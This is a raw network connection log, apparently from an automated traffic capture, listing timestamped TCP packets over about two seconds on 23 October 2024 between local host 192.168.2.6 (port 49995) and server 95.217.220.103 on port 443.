                                                                                                                                                                                                            Oct 23, 2024 07:03:22.803421021 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.803442001 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.803453922 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.803471088 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.803493977 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.829169989 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.829216003 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.829241037 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.829248905 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.829267979 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.829289913 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.922741890 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.922790051 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.922826052 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.922843933 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.922866106 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.922887087 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.924971104 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.925017118 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.925039053 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.925050020 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.925066948 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.925086975 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.989974976 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.990006924 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.990070105 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.990082026 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.990112066 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.043586969 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.043613911 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.043813944 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.043823957 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.043865919 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.066915989 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.066937923 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.067101002 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.067111015 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.067274094 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.165771961 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.165837049 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.165904999 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.165934086 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.165951967 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.165972948 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.167351961 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.167407036 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.167429924 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.167442083 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.167459011 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.167476892 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.186458111 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.186522007 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.186568975 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.186578035 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.186609030 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.186628103 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.284925938 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.284972906 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.285007000 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.285017967 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.285054922 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.286889076 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.286931992 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.286962032 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.286969900 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.286988974 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.287022114 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.305954933 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.306027889 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.306056976 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.306067944 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.306091070 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.306109905 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.404086113 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.404148102 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.404181004 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.404211998 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.404231071 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.404246092 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.405774117 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.405821085 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.405849934 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.405862093 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.405877113 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.405891895 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.424357891 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.424407005 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.424452066 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.424484968 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.424510002 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.424525023 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.522608042 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.522643089 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.522758007 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.522783041 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.522820950 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.524220943 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.524241924 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.524282932 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.524292946 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.524313927 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.524331093 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.542892933 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.542915106 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.543041945 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.543055058 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.543092966 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.641362906 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.641396046 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.641470909 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.641489983 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.641515970 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.641535997 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.643325090 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.643356085 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.643398046 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.643407106 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.643420935 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.643433094 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.645117998 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.645143032 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.645193100 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.645201921 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.645212889 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.645236015 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.663284063 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.663305044 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.663419008 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.663433075 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.663467884 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.761584044 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.761631012 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.761672020 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.761683941 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.761737108 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.761737108 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.763565063 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.763609886 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.763642073 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.763649940 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.763669968 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.763691902 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.781476974 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.781524897 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.781575918 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.781586885 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.781614065 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.781637907 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.879427910 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.879472971 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.879523039 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.879544973 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.879564047 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.879580975 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.881046057 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.881087065 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.881114006 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.881122112 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.881138086 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.881161928 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.883368969 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.883411884 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.883440018 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.883447886 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.883460999 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.883482933 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.901346922 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.901388884 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.901460886 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.901473045 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.901623964 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.998462915 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.998492002 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.998583078 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.998599052 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.998739958 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.000217915 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.000241041 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.000296116 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.000305891 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.000341892 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.018774986 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.018820047 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.018851042 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.018858910 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.018873930 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.018893957 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.020571947 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.020612955 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.020647049 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.020662069 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.020677090 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.020692110 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.117695093 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.117742062 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.117825031 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.117835045 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.117855072 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.117883921 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.119637966 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.119671106 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.119705915 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.119714022 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.119729996 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.119749069 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.137819052 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.137867928 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.138042927 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.138055086 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.138092041 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.139727116 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.139769077 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.139802933 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.139813900 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.139838934 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.139861107 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.236323118 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.236407995 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.236427069 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.236438036 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.236469030 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.236480951 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.238167048 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.238218069 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.238239050 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.238249063 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.238261938 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.238277912 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.240374088 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.240430117 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.240447044 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.240458965 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.240479946 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.240494967 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.258029938 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.258089066 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.258112907 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.258122921 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.258147955 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.258167028 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.299491882 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.299515009 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.299715996 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.299725056 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.299763918 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.356167078 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.356214046 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.356302977 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.356316090 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.356347084 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.356363058 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.358340025 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.358390093 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.358417034 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.358423948 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.358483076 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.375956059 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.376010895 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.376044989 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.376053095 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.376065969 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.376086950 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.377912998 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.377964020 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.377998114 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.378005028 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.378019094 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.378034115 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.474488974 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.474522114 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.474561930 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.474570990 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.474586964 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.474606037 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.476594925 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.476622105 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.476660967 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.476670980 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.476687908 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:24.476708889 CEST49995443192.168.2.695.217.220.103
